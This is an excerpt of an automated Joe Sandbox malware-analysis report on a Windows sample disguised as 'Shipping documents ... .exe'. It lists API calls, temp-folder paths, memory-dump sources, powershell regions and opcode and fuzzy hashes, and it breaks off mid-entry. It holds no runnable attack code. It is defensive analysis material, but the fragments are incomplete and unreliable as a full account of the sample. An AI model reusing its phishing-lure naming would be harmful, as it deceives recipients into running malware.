                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                        • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                        • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                        • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                        APIs
                                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405EDF
                                        • CharNextW.USER32(00000000), ref: 00405EE4
                                        • CharNextW.USER32(00000000), ref: 00405EFC
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsi1309.tmp, xrefs: 00405ED2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi1309.tmp
                                        • API String ID: 3213498283-3576001853
                                        • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                        • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                        • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                        • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                        • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3936084776
                                        • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                        • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                        • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                        • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                        APIs
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll), ref: 0040269A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi1309.tmp$C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll
                                        • API String ID: 1659193697-3689442400
                                        • Opcode ID: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
                                        • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                        • Opcode Fuzzy Hash: 968f49f8d356fad33376679beb12f00283f02b2e5d5c32db5a7590a3cc778f05
                                        • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                        • GetTickCount.KERNEL32 ref: 0040304F
                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                        • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                        • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                        • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                        • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 0040557F
                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                          • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                        • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                        • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                        • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                        APIs
                                        • CharNextExA.USER32(?,0000000A,00000000,6FE830B8,?,6FE816EA,?,00000002,00000002,0000000A), ref: 6FE81974
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2153670485.000000006FE81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE80000, based on PE: true
                                        • Associated: 00000000.00000002.2153651950.000000006FE80000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000000.00000002.2153686664.000000006FE82000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000000.00000002.2153704607.000000006FE83000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000000.00000002.2153723885.000000006FE84000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fe80000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: $
                                        • API String ID: 3213498283-227171996
                                        • Opcode ID: bc7e8b98023c9ada11283eeb0a35410fa21bb8c9d436d133f542956f939d57e4
                                        • Instruction ID: 2998c5211304112072dd6cd35d258ba60c85a0f2d6639b027acd9b613298cbf6
                                        • Opcode Fuzzy Hash: bc7e8b98023c9ada11283eeb0a35410fa21bb8c9d436d133f542956f939d57e4
                                        • Instruction Fuzzy Hash: 69F01C311083CA9ADF11DF54C824BEA7FA9AF16248F540458FDA48B282C775E629C7A1
                                        APIs
                                        • FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                        • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-3936084776
                                        • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                        • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                        • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                        • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                        APIs
                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 00405E78
                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 00405E88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-3125694417
                                        • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                        • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                        • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                        • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                        APIs
                                        • lstrlenW.KERNEL32(?,7622F360,00000000,00000000,?,?,6FE81295,00000000,/TIMEOUT=,00000000), ref: 6FE81A71
                                        • lstrlenW.KERNEL32(?,?,?,6FE81295,00000000,/TIMEOUT=,00000000), ref: 6FE81A7C
                                        • lstrcmpiW.KERNEL32(?,?,?,?,6FE81295,00000000,/TIMEOUT=,00000000), ref: 6FE81A9A
                                        • lstrlenW.KERNEL32(00000000,?,?,6FE81295,00000000,/TIMEOUT=,00000000), ref: 6FE81AB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2153670485.000000006FE81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE80000, based on PE: true
                                        • Associated: 00000000.00000002.2153651950.000000006FE80000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000000.00000002.2153686664.000000006FE82000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000000.00000002.2153704607.000000006FE83000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000000.00000002.2153723885.000000006FE84000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fe80000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: lstrlen$lstrcmpi
                                        • String ID:
                                        • API String ID: 1808961391-0
                                        • Opcode ID: f9062b3d7601ce68e37680be98a692450ad3d6c70f1ab5131483b6045cc4b89a
                                        • Instruction ID: cbdf79f4265768bab3dd61839a7f9ae1ebf40efe2243754549fd8bc746b9fa9e
                                        • Opcode Fuzzy Hash: f9062b3d7601ce68e37680be98a692450ad3d6c70f1ab5131483b6045cc4b89a
                                        • Instruction Fuzzy Hash: 7E018635200518BFDB01AFE5DC80C9D7BE8EF463A472140AAFD28D7210D774DA41DB90
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                        • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                        • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                        • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                        • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Vhk
                                        • API String ID: 0-3219809403
                                        • Opcode ID: 6bdc0069be621edb67a23c57be21e62416a366648cc2551d1f6608402a97f677
                                        • Instruction ID: afd0b99485ec290131d1122aac18d62b339b02f39093bbdbf1cdcc01bfaa6d96
                                        • Opcode Fuzzy Hash: 6bdc0069be621edb67a23c57be21e62416a366648cc2551d1f6608402a97f677
                                        • Instruction Fuzzy Hash: 1DB13C70F1020ACFEB14CFA9C8857ADBBF6FF88714F158529D815A7254EB74A845CB81
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b7dd0ff555aa43cb9fd062c577ebdcffa18e7cb18e5749f07c3cc6aa903c98a
                                        • Instruction ID: 06cb84212389214c752c08cd998c3b46c972047e9b0d57647937b46aa9b23897
                                        • Opcode Fuzzy Hash: 4b7dd0ff555aa43cb9fd062c577ebdcffa18e7cb18e5749f07c3cc6aa903c98a
                                        • Instruction Fuzzy Hash: 92B18C70F1020ACFDB58CFA8DA8179DBBF2EFC8314F158529D814AB254EB74A845CB81
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb52b852e96cc675503fd2873d446ff65ad8b673b29d5ef0becddbe521d1790e
                                        • Instruction ID: 3df5f7aae8d16bbe88734359d72a63d12ee59afdc7403455085565dd4b11d7aa
                                        • Opcode Fuzzy Hash: bb52b852e96cc675503fd2873d446ff65ad8b673b29d5ef0becddbe521d1790e
                                        • Instruction Fuzzy Hash: FB415A34B002158FDB18DF64C958AAEBBF6EFC8754F144868E416EB7A0DB35AD41CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8Nhk$h]hk$h]hk$h]hk$Ihk
                                        • API String ID: 0-2620401904
                                        • Opcode ID: d41b0ce3af9a3993043373d417f3f1aafe0262f236d4e75ff636e843a83196dc
                                        • Instruction ID: e26a6e72c1a7fce39c713150ef61ee9af6fcc0ef9419b9c65737c412754feb7f
                                        • Opcode Fuzzy Hash: d41b0ce3af9a3993043373d417f3f1aafe0262f236d4e75ff636e843a83196dc
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce847753e23eb6ea0c1b5be6a2bc7d3e7bbff8346cc3c0acf5b07740af4f7f69
                                        • Instruction ID: 8b1bbee92c14b79e13e48431869be19d4a9883db844d6532633b666fe5feabe9
                                        • Opcode Fuzzy Hash: ce847753e23eb6ea0c1b5be6a2bc7d3e7bbff8346cc3c0acf5b07740af4f7f69
                                        • Instruction Fuzzy Hash: 49211A74A05219CFCB04DFA8D5909AEBBB5FF89310B148595D909EB352C731FC41CBA1
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d208a5196e329aa6661cf8e9911d1dcb0fb25b7bd6de741b41fcff5425527be7
                                        • Instruction ID: 5818f002d9179428405b4659d891db303b2e146afcb55aa249f48a68c82293aa
                                        • Opcode Fuzzy Hash: d208a5196e329aa6661cf8e9911d1dcb0fb25b7bd6de741b41fcff5425527be7
                                        • Instruction Fuzzy Hash: 5F2117B4A00209DFCB04CF98D9809AEBBF5FF89310B158199E909AB352C731FD41CBA1
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a87542cfcf29b1d3d6fe2878872e80f0e5c60c37a78c95a82bb7cc5dc10b99e
                                        • Instruction ID: 33d3867c462eac62814fc2d66b8760df59198fb25206e63be05a24b1b279471a
                                        • Opcode Fuzzy Hash: 5a87542cfcf29b1d3d6fe2878872e80f0e5c60c37a78c95a82bb7cc5dc10b99e
                                        • Instruction Fuzzy Hash: CB017B367203148BDB5047AAD810176FB96DFC5226F14C03FD744C7642DA32D845C7A0
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2777307236.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6ef0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4caf71b51d55808fe346d47ddc09d8cb3304185b6e5de098421ce52bcc2adcb4
                                        • Instruction ID: 0bf7a287822e7d8bcfad1d1b4fcff53b4213d697c8d3f84b196180bf1a0326ca
                                        • Opcode Fuzzy Hash: 4caf71b51d55808fe346d47ddc09d8cb3304185b6e5de098421ce52bcc2adcb4
                                        • Instruction Fuzzy Hash: 4B01D633A39341DFFFF50B60A4007F277719F82659FA920A6D7014B191E7758591C3A2
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2769613516.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_4240000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a8db59f2859ad3ae537842ed8e237c51006d019860bad2680974f7a3f868c3f
                                        • Instruction ID: 4ccfc5cd3294baa1d6c22ac2a5efca8b4c854b960203aefdc447724486287ca4
